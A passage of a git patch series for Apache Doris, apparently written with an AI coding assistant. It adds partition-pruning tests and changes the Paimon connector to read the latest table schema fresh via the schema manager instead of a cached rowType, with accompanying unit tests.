+826,10 @@ static Fixture with(List partitions) { return build(partitions, false); } + static Fixture with(List partitions, Type partitionColType) { + return build(partitions, false, partitionColType); + } + /** Adds time-travel SPI stubs on top of the base fixture. */ static Fixture timeTravel() { return build(Arrays.asList( @@ -760,6 +850,11 @@ static Fixture noHandle() { } private static Fixture build(List partitions, boolean timeTravel) { + return build(partitions, timeTravel, Type.DATEV2); + } + + private static Fixture build(List partitions, boolean timeTravel, + Type partitionColType) { ConnectorMetadata metadata = Mockito.mock(ConnectorMetadata.class); ConnectorSession session = Mockito.mock(ConnectorSession.class); ConnectorTableHandle handle = Mockito.mock(ConnectorTableHandle.class); @@ -775,8 +870,9 @@ private static Fixture build(List partitions, boolean ti Mockito.when(metadata.listPartitions(Mockito.eq(session), Mockito.eq(handle), Mockito.any())) .thenReturn(partitions); - // Single DATE partition column "dt" — the LATEST schema. - List schema = Collections.singletonList(new Column("dt", Type.DATEV2)); + // Single partition column "dt" (DATE by default; VARCHAR variant exercises the genuine-null + // string-key path) — the LATEST schema. + List schema = Collections.singletonList(new Column("dt", partitionColType)); PluginDrivenSchemaCacheValue latestCacheValue = new PluginDrivenSchemaCacheValue( schema, schema, Collections.singletonList("dt")); diff --git a/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodePartitionPruningTest.java b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodePartitionPruningTest.java index 75e48eeb069be6..2cd78d8057bd82 100644 --- a/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodePartitionPruningTest.java +++ b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodePartitionPruningTest.java @@ -108,6 +108,44 @@ public void testPrunedToZeroReturnsEmptyNonNullForShortCircuit() { Assertions.assertTrue(result.isEmpty()); } + @Test + public void testPrunedToZeroWithoutIgnoreStillShortCircuits() { + // Default (non-predicate-driven connector, ignoreShortCircuit=false): a genuine prune-to-zero still + // maps to the non-null empty list so getSplits() short-circuits — the existing MaxCompute parity. + SelectedPartitions emptyPruned = new SelectedPartitions(5, Collections.emptyMap(), true); + List result = PluginDrivenScanNode.resolveRequiredPartitions(emptyPruned, false); + Assertions.assertNotNull(result); + Assertions.assertTrue(result.isEmpty()); + } + + @Test + public void testPrunedToZeroWithIgnoreShortCircuitScansAll() { + // A predicate-driven connector (paimon: ConnectorScanPlanProvider.ignorePartitionPruneShortCircuit() + // == true) must NOT short-circuit a genuine prune-to-zero. With the master-parity isNull=false a + // genuine-null paimon partition renders as a NON-null sentinel, so `region IS NULL` prunes EVERY + // partition away (empty set over a 5-partition universe); short-circuiting here would drop the + // genuine-null row. Returning null (scan-all) lets getSplits() call planScan, which the paimon SDK + // answers from the pushed `region IS NULL` predicate -> the genuine-null row is returned (master + // PaimonScanNode parity; regression test_paimon_runtime_filter_partition_pruning qt_null_partition_4). + // MUTATION: ignoring the flag -> returns the empty short-circuit list -> red. + SelectedPartitions emptyPruned = new SelectedPartitions(5, Collections.emptyMap(), true); + Assertions.assertNull( + PluginDrivenScanNode.resolveRequiredPartitions(emptyPruned, true), + "a predicate-driven connector must scan-all (null) on a prune-to-zero, not short-circuit"); + } + + @Test + public void testPrunedSubsetWithIgnoreShortCircuitStillForwards() { + // The flag only governs the empty/short-circuit case. A non-empty pruned set is still forwarded + // unchanged (the connector may ignore it, but the non-empty contract is preserved). + Map items = new LinkedHashMap<>(); + items.put("pt=1", Mockito.mock(PartitionItem.class)); + SelectedPartitions pruned = new SelectedPartitions(5, items, true); + List result = PluginDrivenScanNode.resolveRequiredPartitions(pruned, true); + Assertions.assertNotNull(result); + Assertions.assertEquals(1, result.size()); + } + @Test public void testPrunedEmptyOverEmptyUniverseScansAll() { // RD-1 (B5b-4): a pruned-but-empty selection whose partition UNIVERSE was ALSO empty From 8f65cddccfee916f70ee303b262cabbc15f98cec Mon Sep 17 00:00:00 2001 From: morningman Date: Sat, 20 Jun 2026 16:18:26 +0800 Subject: [PATCH 128/128] =?UTF-8?q?fix:=20CI=20973480=20=E2=80=94=20paimon?= =?UTF-8?q?=20no-cache=20schema=20reads=20latest=20via=20schemaManager=20(?= =?UTF-8?q?not=20cached=20rowType)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit The last failing test of 973480 (test_paimon_table_meta_cache:112): a no-cache catalog (meta.cache.paimon.table.ttl-second=0) returns 2 columns instead of 3 after an external ALTER TABLE ADD COLUMNS. 16b62559's "Fix B" bypassed the FE schema cache (initSchema) but the bypass still read a stale schema, so the test kept failing. Root cause (master test .out is the spec): the connector's LATEST schema path read table.rowType(). paimon's CatalogFactory.createCatalog wraps a CachingCatalog (cache.enabled defaults true), so catalog.getTable() returns a cached Table whose rowType() is FROZEN at load time; only latestSnapshot()/schemaManager() read files fresh. That is why the no-cache DATA path was fresh (snapshot re-read) while the SCHEMA path was stale. An ALTER ADD COLUMNS bumps the schema file (new schema id) WITHOUT a new snapshot, so the latest snapshot's schemaId also stays behind — only schemaManager().latest() advances. Legacy PaimonExternalTable read the latest schema via schemaManager().latest() (never rowType()); the SPI cutover regressed to rowType(). Fix (connector-local, master parity): PaimonConnectorMetadata.getTableSchema (latest path) reads the latest schema FRESH via a new PaimonCatalogOps.latestSchema seam (((DataTable) table).schemaManager().latest()) for a non-system data table; partition and primary keys come from that resolved schema too. Dual guard: system tables (isSystemTable()) keep their synthetic rowType() — some are not DataTable ($snapshots/$manifests) and the DataTable-backed ones ($ro/$audit_log/$binlog) need the synthetic schema; a non-DataTable backend (FormatTable) / schema-less table -> latestSchema empty -> fall back to rowType(). This also fixes the with-cache REFRESH assertion (line 117): REFRESH busts the FE schema cache but not the paimon CachingCatalog, so only schemaManager().latest() reflects the external change. TDD: RED getTableSchemaReadsLatestSchemaNotCachedRowType (expected 3 but was 2, same symptom as CI) -> GREEN; plus sys-table guard + empty-latest fallback tests. Paimon module 318/0/0 (1 live-connectivity skip), checkstyle 0. e2e docker-gated (enablePaimonTest=true) NOT run. Co-Authored-By: Claude Opus 4.8 (1M context) Claude-Session: https://claude.ai/code/session_011mTrPcvMZtFjsxWJM5TRnG --- .../connector/paimon/PaimonCatalogOps.java | 28 ++++++ .../paimon/PaimonConnectorMetadata.java | 27 +++++- .../paimon/PaimonConnectorMetadataTest.java | 87 +++++++++++++++++++ .../paimon/RecordingPaimonCatalogOps.java | 11 +++ 4 files changed, 150 insertions(+), 3 deletions(-) diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogOps.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogOps.java index c44ffd0d54cf7a..0fb1145d4cc31d 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogOps.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogOps.java @@ -134,6 +134,21 @@ void dropTable(Identifier identifier, boolean ignoreIfNotExists) */ PaimonSchemaSnapshot schemaAt(Table table, long schemaId); + /** + * Returns the LATEST schema read FRESH via the table's schema manager + * ({@code ((DataTable) table).schemaManager().latest()}), reduced to the fields + partition keys + + * primary keys the metadata layer needs. Unlike {@code table.rowType()} — which a paimon + * {@code CachingCatalog} freezes at the cached {@code Table}'s load time — {@code schemaManager().latest()} + * is a LIVE read of the schema directory, so it reflects an external {@code ALTER} (which bumps the + * schema file/id WITHOUT creating a new snapshot, so the latest snapshot's schemaId stays behind). + * Mirrors legacy {@code PaimonExternalTable}, which read {@code schemaManager().latest()} for the + * latest schema (never {@code rowType()}). + * + *

    Returns {@link Optional#empty()} when {@code table} is not a {@code DataTable} (e.g. a + * {@code FormatTable} backend) or has no schema yet, so the caller falls back to {@code table.rowType()}. + */ + Optional latestSchema(Table table); + // ---- B5b-2c: branch time-travel resolution ---- /** @@ -326,6 +341,19 @@ public PaimonSchemaSnapshot schemaAt(Table table, long schemaId) { tableSchema.fields(), tableSchema.partitionKeys(), tableSchema.primaryKeys()); } + @Override + public Optional latestSchema(Table table) { + // schemaManager() is only on DataTable (same cast schemaAt uses). latest() is a LIVE read + // of the schema directory, so it returns the post-ALTER schema even off a CachingCatalog- + // cached Table whose rowType() is frozen at load time. A non-DataTable backend (e.g. a + // FormatTable) has no schema history -> empty -> the caller falls back to table.rowType(). + if (!(table instanceof DataTable)) { + return Optional.empty(); + } + return ((DataTable) table).schemaManager().latest() + .map(s -> new PaimonSchemaSnapshot(s.fields(), s.partitionKeys(), s.primaryKeys())); + } + @Override public boolean branchExists(Table table, String branchName) { // Mirrors legacy PaimonUtil.resolvePaimonBranch: only a FileStoreTable has a diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java index ab35fc3a28c9b3..f29eaf9dddd73e 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java @@ -208,9 +208,30 @@ public ConnectorTableSchema getTableSchema( // resolveTable branches on isSystemTable() to pick the 4-arg sys Identifier vs the 2-arg // base Identifier on a transient-table-null reload, so a sys handle reads its OWN rowType. Table table = resolveTable(paimonHandle); - // The LATEST path keys partition_columns off the HANDLE's partitionKeys (the handle was - // built from the latest table.partitionKeys()); fields + primaryKeys come from the live - // table. Sharing buildTableSchema with the at-snapshot path keeps the two from drifting. + // For a non-system data table, read the LATEST schema FRESH via the connector's schema manager + // (schemaManager().latest()), NOT the cached Table's rowType(): paimon's CachingCatalog returns a + // Table instance whose rowType() is FROZEN at load time, while an external ALTER ADD COLUMNS bumps + // the schema file (new schema id) WITHOUT a new snapshot — so rowType() (and the latest snapshot's + // schemaId) stay behind while schemaManager().latest() advances. Reading latest restores legacy + // PaimonExternalTable parity so a no-cache catalog (meta.cache.paimon.table.ttl-second=0) — and a + // with-cache catalog after REFRESH busts the FE schema cache — reflects the external schema change. + // partitionKeys/primaryKeys also come from the resolved latest schema (parity with the at-snapshot + // path; the handle's keys were built from the stale cached table). latestSchema() is empty for a + // non-DataTable backend (e.g. FormatTable) or a schema-less table -> fall back to rowType(). System + // tables (isSystemTable()) always keep their synthetic rowType() (no schema-version history; some + // are not DataTable). Sharing buildTableSchema with the at-snapshot path keeps the two from drifting. + if (!paimonHandle.isSystemTable()) { + Optional latest = catalogOps.latestSchema(table); + if (latest.isPresent()) { + PaimonCatalogOps.PaimonSchemaSnapshot schema = latest.get(); + return buildTableSchema( + paimonHandle.getTableName(), + table, + schema.fields(), + schema.partitionKeys(), + schema.primaryKeys()); + } + } return buildTableSchema( paimonHandle.getTableName(), table, diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataTest.java index acc5d8323e2d05..c7f155939bf0d1 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataTest.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorMetadataTest.java @@ -297,6 +297,93 @@ public void getTableSchemaAtSnapshotAlsoForcesNullable() { "the at-snapshot read path must also force columns nullable (legacy parity)"); } + // --------------------------------------------------------------------- + // no-cache meta-cache: the LATEST schema must be read fresh via schemaManager().latest(), + // not the CachingCatalog-frozen rowType() (test_paimon_table_meta_cache line 112) + // --------------------------------------------------------------------- + + @Test + public void getTableSchemaReadsLatestSchemaNotCachedRowType() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + // The handle's transient Table is the CachingCatalog-cached instance whose rowType() is + // FROZEN at load time (2 columns) — this is what the connector used to read. + ops.table = new FakePaimonTable( + "t1", rowType("id", "name"), Collections.emptyList(), Collections.emptyList()); + // After an external ALTER ADD COLUMNS, the schema manager's latest() advances to 3 fields + // (a NEW schema file, with NO new snapshot). This is the live read the latest path must use. + ops.latestSchema = Optional.of(new PaimonCatalogOps.PaimonSchemaSnapshot( + Arrays.asList( + new DataField(0, "id", DataTypes.INT()), + new DataField(1, "name", DataTypes.INT()), + new DataField(2, "new_col", DataTypes.INT())), + Collections.emptyList(), + Collections.emptyList())); + + ConnectorTableHandle handle = metadataWith(ops).getTableHandle(null, "db1", "t1").get(); + ConnectorTableSchema schema = metadataWith(ops).getTableSchema(null, handle); + + // WHY: a paimon CachingCatalog caches the Table object; its rowType() is frozen at load time + // while schemaManager().latest() reads the schema directory fresh. An external ALTER ADD + // COLUMNS bumps the schema file (new id) WITHOUT a new snapshot, so the latest snapshot's + // schemaId stays behind and only schemaManager().latest() sees the 3rd column. The latest + // path MUST read schemaManager().latest() (legacy PaimonExternalTable parity), not the cached + // rowType(). This is the no-cache meta-cache regression (test_paimon_table_meta_cache line + // 112: expected 3 but was 2). MUTATION: reading table.rowType() (the cached 2-col schema) -> red. + Assertions.assertEquals(3, schema.getColumns().size(), + "the latest schema path must read schemaManager().latest() (3 cols after external " + + "ALTER), not the CachingCatalog-frozen rowType() (2 cols)"); + Assertions.assertEquals("new_col", schema.getColumns().get(2).getName(), + "the externally-added column must surface via schemaManager().latest()"); + } + + @Test + public void getTableSchemaKeepsSyntheticRowTypeForSystemTable() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + // A system table ($snapshots-like) whose synthetic rowType() is its OWN 2-col schema. + FakePaimonTable sysTbl = new FakePaimonTable( + "t1$snapshots", rowType("snapshot_id", "schema_id"), + Collections.emptyList(), Collections.emptyList()); + // latestSchema would return a DIFFERENT (base-table) 3-col schema; it MUST be ignored for a sys table. + ops.latestSchema = Optional.of(new PaimonCatalogOps.PaimonSchemaSnapshot( + Arrays.asList( + new DataField(0, "id", DataTypes.INT()), + new DataField(1, "name", DataTypes.INT()), + new DataField(2, "new_col", DataTypes.INT())), + Collections.emptyList(), Collections.emptyList())); + PaimonTableHandle handle = PaimonTableHandle.forSystemTable("db1", "t1", "snapshots", false); + handle.setPaimonTable(sysTbl); + + ConnectorTableSchema schema = metadataWith(ops).getTableSchema(null, handle); + + // WHY: system tables ($snapshots/$manifests are NOT DataTable; $ro/$audit_log/$binlog ARE + // DataTable but their correct DESC is the SYNTHETIC sys rowType(), not the base schema). The + // latest path MUST keep table.rowType() for ALL sys handles, guarded by isSystemTable(). + // MUTATION: dropping the isSystemTable() guard (always reading latestSchema) -> 3 cols (and + // a ClassCastException for the non-DataTable sys tables in production) -> red. + Assertions.assertEquals(2, schema.getColumns().size(), + "a system table must keep its synthetic rowType(), never schemaManager().latest()"); + Assertions.assertFalse(ops.log.contains("latestSchema"), + "the latest-schema read must be skipped for a system table"); + } + + @Test + public void getTableSchemaFallsBackToRowTypeWhenLatestSchemaAbsent() { + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + ops.table = new FakePaimonTable( + "t1", rowType("id", "name"), Collections.emptyList(), Collections.emptyList()); + // latestSchema empty: a non-DataTable (FormatTable) backend or a schema-less table. + ops.latestSchema = Optional.empty(); + + ConnectorTableHandle handle = metadataWith(ops).getTableHandle(null, "db1", "t1").get(); + ConnectorTableSchema schema = metadataWith(ops).getTableSchema(null, handle); + + // WHY: when schemaManager().latest() is unavailable (non-DataTable backend / empty table), + // the latest path must fall back to table.rowType() rather than crash. MUTATION: + // unconditionally dereferencing latestSchema().get() -> NoSuchElementException -> red. + Assertions.assertEquals(2, schema.getColumns().size(), + "an absent latest schema must fall back to the table's rowType()"); + } + // --------------------------------------------------------------------- // FIX-MAPPING-FLAG-KEYS — type-mapping toggles read the canonical dotted // CREATE-CATALOG keys (enable.mapping.varbinary / enable.mapping.timestamp_tz) diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/RecordingPaimonCatalogOps.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/RecordingPaimonCatalogOps.java index b966c528a03b9c..1b9915c9dec9ae 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/RecordingPaimonCatalogOps.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/RecordingPaimonCatalogOps.java @@ -103,6 +103,10 @@ final class RecordingPaimonCatalogOps implements PaimonCatalogOps { PaimonCatalogOps.TagSnapshot tagSnapshot; /** schema returned by schemaAt (set per-test to drive the at-schemaId column mapping). */ PaimonCatalogOps.PaimonSchemaSnapshot schemaAt; + /** latest schema returned by latestSchema (default empty => caller falls back to table.rowType()). */ + java.util.Optional latestSchema = java.util.Optional.empty(); + /** The table the metadata layer passed to the most recent latestSchema call. */ + Table lastLatestSchemaTable; /** The arguments the metadata layer passed to the most recent time-travel seam call. */ long lastSnapshotSchemaIdArg; String lastTagNameArg; @@ -279,6 +283,13 @@ public PaimonCatalogOps.PaimonSchemaSnapshot schemaAt(Table table, long schemaId return schemaAt; } + @Override + public java.util.Optional latestSchema(Table table) { + log.add("latestSchema"); + lastLatestSchemaTable = table; + return latestSchema; + } + @Override public boolean branchExists(Table table, String branchName) { log.add("branchExists:" + branchName);